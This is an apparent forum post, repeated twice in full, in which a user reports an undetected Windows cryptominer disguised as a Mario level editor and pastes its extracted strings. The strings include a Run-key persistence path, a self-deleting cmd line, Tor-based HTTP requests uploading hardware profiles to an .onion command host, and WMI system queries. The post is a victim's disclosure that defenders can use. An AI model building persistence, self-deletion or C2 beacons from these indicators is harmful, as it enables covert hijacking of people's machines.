Nothing detects this yet.
Not malwarebytes
Not ADW
Not Win defender
No antivirus programs
The process creates a C:\Program Files\ObjectInstallerService folder containing a data file and objectinstaller.exe
This is a delayed service in Windows services.
The .exe file is a self extracting executable.
It creates a Tor folder in program files.
Examining the contents of the zip without executing it lists a number of files. One of which contains the following string.
The executable strings include:
A p p D a t a G P U R i s e g p u r i s e . z i p !G P U R i s e A g e n t . e x e s e r v i c e 2 o t h e r p a y l o a d 2 . z i p s t a r t _ m i n 1\ O b j e c t I n s t a l l e r S e r v i c e \ W/ C c h o i c e / C Y / N / D Y / T 8 & r m d i r / Q / S " " c m d . e x e [S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n 1 2 7 . 0 . 0 . 1 -m j o 7 m w 3 q 4 m t g s i k z . o n i o n G E T / á H T T P / 1 . 1
H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n
C o n n e c t i o n : k e e p - a l i v e
A c c e p t : t e x t / h t m l
U s e r - A g e n t : g p u b o o s t 0 . 1
7\
C o n t e n t - L e n g t h : ( . * ? ) \
X 2 d e s k t o p
l a p t o p ;s e l e c t * f r o m W i n 3 2 _ P r o c e s s o r Gs e l e c t * f r o m W i n 3 2 _ V i d e o C o n t r o l l e r r o o t \ C I M V 2 iS E L E C T T o t a l P h y s i c a l M e m o r y F R O M W i n 3 2 _ C o m p u t e r S y s t e m 'T o t a l P h y s i c a l M e m o r y n a m e A d a p t e r R A M
n v i d i a a m d N u m b e r O f C o r e s SS E L E C T C a p t i o n F R O M W i n 3 2 _ O p e r a t i n g S y s t e m / u p l o a d / i n s t a l l !P O S T / u p l o a d H T T P / 1 . 1
H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n
C o n n e c t i o n : k e e p - a l i v e
A c c e p t : t e x t / h t m l
C o n t e n t - t y p e : a p p l i c a t i o n / j s o n
C o n t e n t - L e n g t h : 7
U s e r - A g e n t : m i n e r 0 . 1
g e f o r c e
r a d e o n QB a d r e s p o n s e r e c e i v e d f r o m p r o x y s e r v e r . 1A u t h e n t i c a t i o n r e q u i r e d . CO p e r a t i o n c o m p l e t e d s u c c e s s f u l l y . ;G e n e r a l S O C K S s e r v e r f a i l u r e . EC o n n e c t i o n n o t a l l o w e d b y r u l e s e t . )N e t w o r k u n r e a c h a b l e . #H o s t u n r e a c h a b l e . 'C o n n e c t i o n r e f u s e d . T T L e x p i r e d . -C o m m a n d n o t s u p p o r t e d . 7A d d r e s s t y p e n o t s u p p o r t e d . U n k n o w n e r r o r . t o r t o r . e x e t o r . z i p MT o r h a s s u c c e s s f u l l y o p e n e d a c i r c u i t . \ T o r \ X = Y = E n t e r X O f f s e t X O f f s e t 1 'W r o n g P a r a m e t e r s . . . E n t e r Y O f f s e t Y O f f s e t %p i c t u r e L e v e l . I m a g e p i c t u r e L e v e l
p R i g h t p L e f t p S e l e c t e d l i s t m e n u m e n u S t r i p 1 +f i l e T o o l S t r i p M e n u I t e m F i l e m O p e n O p e n . . . m S a v e S a v e m S a v e A s S a v e a s . . . %t o o l S t r i p M e n u I t e m 1 m E x i t E x i t 1a c t i o n d T o o l S t r i p M e n u I t e m A c t i o n s Ao f f s e t X S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t X S e l e c t e d Ao f f s e t Y S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t Y S e l e c t e d -a b o u t T o o l S t r i p M e n u I t e m A b o u t P T o p P R e s t )M a r i o L e v e l s | * . x m l p B u t t o m
s t a t u s s t a t u s S t r i p 1
l a b e l x
l a b e l y
T a h o m a o b j e c t n a m e l a b e l $ t h i s . I c o n M a i n F o r m L e v e l E d i t o r . d l l c I n t c B o o l T r u e F a l s e
: X = , Y = . A r i a l l N a m e
l a b e l 1 c I n t 1 c I n t 2 c I n t 3
c B o o l 1
c B o o l 2
c B o o l 3
b C l o s e C l o s e b S a v e F o r m P a r a m s #O b j e c t P r o p e r t i e s / d a t a / u / I n s t a l l S e r v i c e -O b j e c t I n s t a l l e r S e r v i c e KM a r i o L e v e l E d i t o r . P r o p e r t i e s . R e s o u r c e s S e l e c t e d C a p t i o n
.onion is undeniably the Tor network. I believe its a GPU miner. It mines bitcoin remotely by taking over your GPU.
I don't know how I got this or who to inform about this file.
I saved a .zip copy if anyone wants it.
Not malwarebytes
Not ADW
Not Win defender
No antivirus programs
The process creates a C:\Program Files\ObjectInstallerService folder containing a data file and objectinstaller.exe
This is a delayed service in Windows services.
The .exe file is a self extracting executable.
It creates a Tor folder in program files.
Examining the contents of the zip without executing it lists a number of files. One of which contains the following string.
The executable strings include:
A p p D a t a G P U R i s e g p u r i s e . z i p !G P U R i s e A g e n t . e x e s e r v i c e 2 o t h e r p a y l o a d 2 . z i p s t a r t _ m i n 1\ O b j e c t I n s t a l l e r S e r v i c e \ W/ C c h o i c e / C Y / N / D Y / T 8 & r m d i r / Q / S " " c m d . e x e [S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n 1 2 7 . 0 . 0 . 1 -m j o 7 m w 3 q 4 m t g s i k z . o n i o n G E T / á H T T P / 1 . 1
H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n
C o n n e c t i o n : k e e p - a l i v e
A c c e p t : t e x t / h t m l
U s e r - A g e n t : g p u b o o s t 0 . 1
7\
C o n t e n t - L e n g t h : ( . * ? ) \
X 2 d e s k t o p
l a p t o p ;s e l e c t * f r o m W i n 3 2 _ P r o c e s s o r Gs e l e c t * f r o m W i n 3 2 _ V i d e o C o n t r o l l e r r o o t \ C I M V 2 iS E L E C T T o t a l P h y s i c a l M e m o r y F R O M W i n 3 2 _ C o m p u t e r S y s t e m 'T o t a l P h y s i c a l M e m o r y n a m e A d a p t e r R A M
n v i d i a a m d N u m b e r O f C o r e s SS E L E C T C a p t i o n F R O M W i n 3 2 _ O p e r a t i n g S y s t e m / u p l o a d / i n s t a l l !P O S T / u p l o a d H T T P / 1 . 1
H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n
C o n n e c t i o n : k e e p - a l i v e
A c c e p t : t e x t / h t m l
C o n t e n t - t y p e : a p p l i c a t i o n / j s o n
C o n t e n t - L e n g t h : 7
U s e r - A g e n t : m i n e r 0 . 1
g e f o r c e
r a d e o n QB a d r e s p o n s e r e c e i v e d f r o m p r o x y s e r v e r . 1A u t h e n t i c a t i o n r e q u i r e d . CO p e r a t i o n c o m p l e t e d s u c c e s s f u l l y . ;G e n e r a l S O C K S s e r v e r f a i l u r e . EC o n n e c t i o n n o t a l l o w e d b y r u l e s e t . )N e t w o r k u n r e a c h a b l e . #H o s t u n r e a c h a b l e . 'C o n n e c t i o n r e f u s e d . T T L e x p i r e d . -C o m m a n d n o t s u p p o r t e d . 7A d d r e s s t y p e n o t s u p p o r t e d . U n k n o w n e r r o r . t o r t o r . e x e t o r . z i p MT o r h a s s u c c e s s f u l l y o p e n e d a c i r c u i t . \ T o r \ X = Y = E n t e r X O f f s e t X O f f s e t 1 'W r o n g P a r a m e t e r s . . . E n t e r Y O f f s e t Y O f f s e t %p i c t u r e L e v e l . I m a g e p i c t u r e L e v e l
p R i g h t p L e f t p S e l e c t e d l i s t m e n u m e n u S t r i p 1 +f i l e T o o l S t r i p M e n u I t e m F i l e m O p e n O p e n . . . m S a v e S a v e m S a v e A s S a v e a s . . . %t o o l S t r i p M e n u I t e m 1 m E x i t E x i t 1a c t i o n d T o o l S t r i p M e n u I t e m A c t i o n s Ao f f s e t X S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t X S e l e c t e d Ao f f s e t Y S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t Y S e l e c t e d -a b o u t T o o l S t r i p M e n u I t e m A b o u t P T o p P R e s t )M a r i o L e v e l s | * . x m l p B u t t o m
s t a t u s s t a t u s S t r i p 1
l a b e l x
l a b e l y
T a h o m a o b j e c t n a m e l a b e l $ t h i s . I c o n M a i n F o r m L e v e l E d i t o r . d l l c I n t c B o o l T r u e F a l s e
: X = , Y = . A r i a l l N a m e
l a b e l 1 c I n t 1 c I n t 2 c I n t 3
c B o o l 1
c B o o l 2
c B o o l 3
b C l o s e C l o s e b S a v e F o r m P a r a m s #O b j e c t P r o p e r t i e s / d a t a / u / I n s t a l l S e r v i c e -O b j e c t I n s t a l l e r S e r v i c e KM a r i o L e v e l E d i t o r . P r o p e r t i e s . R e s o u r c e s S e l e c t e d C a p t i o n
.onion is undeniably the Tor network. I believe its a GPU miner. It mines bitcoin remotely by taking over your GPU.
I don't know how I got this or who to inform about this file.
I saved a .zip copy if anyone wants it.